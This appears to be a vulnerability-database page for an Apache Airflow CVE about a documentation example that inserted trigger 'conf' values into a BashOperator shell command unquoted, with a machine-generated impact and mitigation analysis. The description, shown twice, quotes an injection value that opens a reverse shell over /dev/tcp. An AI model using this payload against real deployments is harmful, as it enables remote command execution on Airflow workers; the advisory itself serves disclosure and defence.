CVE-2026-42252: CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine in Apache Software Foundation Apache Airflow
Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.
AI Analysis
Technical Summary
Apache Airflow's official documentation previously included an example of BashOperator usage that directly embedded user-supplied parameters from dag_run.conf into a shell command without quoting or sanitization. This allowed authenticated users with DAG trigger permissions to inject shell metacharacters via the conf field, potentially executing arbitrary commands on the worker node. The issue is due to unsafe documentation patterns rather than a direct software flaw. The documentation was corrected in Apache Airflow 3.2.2 to include proper shell quoting and warnings about this risk. Deployments that copied the vulnerable pattern are at risk until they update their DAG code or upgrade to the fixed documentation version. This vulnerability is similar to prior documentation-related issues (CVE-2025-50213, CVE-2025-27018) involving unsafe template usage.
Potential Impact
An authenticated user with permission to trigger DAG runs could exploit this issue by injecting shell commands through the conf parameter, leading to arbitrary command execution on the Airflow worker. This could compromise the worker environment and potentially affect the broader system depending on deployment context. The impact is limited to deployments that implemented DAGs based on the vulnerable documentation example without applying proper input sanitization or quoting.
Mitigation Recommendations
Users should upgrade to Apache Airflow version 3.2.2 or later to obtain the corrected documentation that includes explicit shell quoting and safety warnings. Additionally, DAG authors should review and update any DAG code modeled on the vulnerable example to ensure that user-supplied parameters are properly quoted or sanitized before being passed to shell commands. Since this is primarily a documentation issue, no direct software patch is indicated beyond upgrading to receive the fixed docs. No further action is required if the deployment does not use the vulnerable pattern or if input sanitization is already implemented.
CVE-2026-42252: CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine in Apache Software Foundation Apache Airflow
Description
Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.
Weaknesses
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
Apache Airflow's official documentation previously included an example of BashOperator usage that directly embedded user-supplied parameters from dag_run.conf into a shell command without quoting or sanitization. This allowed authenticated users with DAG trigger permissions to inject shell metacharacters via the conf field, potentially executing arbitrary commands on the worker node. The issue is due to unsafe documentation patterns rather than a direct software flaw. The documentation was corrected in Apache Airflow 3.2.2 to include proper shell quoting and warnings about this risk. Deployments that copied the vulnerable pattern are at risk until they update their DAG code or upgrade to the fixed documentation version. This vulnerability is similar to prior documentation-related issues (CVE-2025-50213, CVE-2025-27018) involving unsafe template usage.
Potential Impact
An authenticated user with permission to trigger DAG runs could exploit this issue by injecting shell commands through the conf parameter, leading to arbitrary command execution on the Airflow worker. This could compromise the worker environment and potentially affect the broader system depending on deployment context. The impact is limited to deployments that implemented DAGs based on the vulnerable documentation example without applying proper input sanitization or quoting.
Mitigation Recommendations
Users should upgrade to Apache Airflow version 3.2.2 or later to obtain the corrected documentation that includes explicit shell quoting and safety warnings. Additionally, DAG authors should review and update any DAG code modeled on the vulnerable example to ensure that user-supplied parameters are properly quoted or sanitized before being passed to shell commands. Since this is primarily a documentation issue, no direct software patch is indicated beyond upgrading to receive the fixed docs. No further action is required if the deployment does not use the vulnerable pattern or if input sanitization is already implemented.
Technical Details
- Data Version
- 5.2
- Assigner Short Name
- apache
- Date Reserved
- 2026-04-25T18:49:46.124Z
- Cvss Version
- null
- State
- PUBLISHED
- Remediation Level
- null
Threat ID: 6a1d4e71e29bf47b50cd4977
Added to database: 6/1/2026, 9:18:41 AM
Last enriched: 6/1/2026, 9:48:29 AM
Last updated: 6/2/2026, 5:45:38 AM
Views: 8
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.